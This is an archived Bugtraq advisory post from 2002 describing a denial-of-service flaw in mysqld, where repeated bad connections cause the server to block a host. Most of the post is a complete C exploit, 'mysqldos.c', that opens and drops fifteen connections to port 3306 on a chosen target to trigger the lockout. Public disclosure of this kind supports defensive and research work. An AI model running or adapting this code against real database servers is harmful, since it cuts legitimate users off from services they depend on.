[26781] in bugtraq
=?iso-8859-1?Q?DoS_against_mysqld?=
daemon@ATHENA.MIT.EDU (luca.ercoli@inwind.it)
Fri Aug 23 11:53:16 2002
Date: Fri, 23 Aug 2002 12:19:19 +0200
Message-Id: <H1AKO7$38F86B57E0A762457F13C06DC4353915@libero.it>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
From: "luca.ercoli@inwind.it" <luca.ercoli@inwind.it>
To: bugtraq@securityfocus.com
Content-Transfer-Encoding: 8bit
If are create more than eleven bad connection (ex. Bad Handshake)
at port mysqld, the server, from this time, block all incoming
connections.
This is the error:
mysql> connect test 127.0.0.1
ERROR 1129: Host 'localhost.localdomain' is blocked because of many
connection errors. Unblock with 'mysqladmin flush-hosts'
This is the exploit:
/*
mysqldos.c
FOR EDUCATIONAL PURPOSE
Luca Ercoli luca.ercoli@inwind.it
tested against ver 3.23.49a
*/
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#define PORT 3306
int main(int argc, char *argv[]){
int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;
int c;
int n;
char *host = NULL;
if(argc < 2 ) {
printf ("Sintassi: %s -h host\n",argv[0]);
exit(0);
}
while((n = getopt(argc, argv, "h")) != -1) {
switch(n) {
case 'h':
host = optarg;
break;
default:
printf("Errore in argv\n");
exit(0);
}
}
if ((he = gethostbyname(argv[2])) == NULL)
{
herror("gethostbyname");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *) he->h_addr);
bzero(&(their_addr.sin_zero), 8);
printf("Sending dos ");
for (c=0;c<15;c++){
if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket");
exit(1);
}
if (connect (sockfd, (struct sockaddr *) &their_addr, sizeof(struct
sockaddr)) == -1)
{
perror("connect");
exit(1);
}
printf (".");
close(sockfd);
}
printf("\n");
return 1;
}
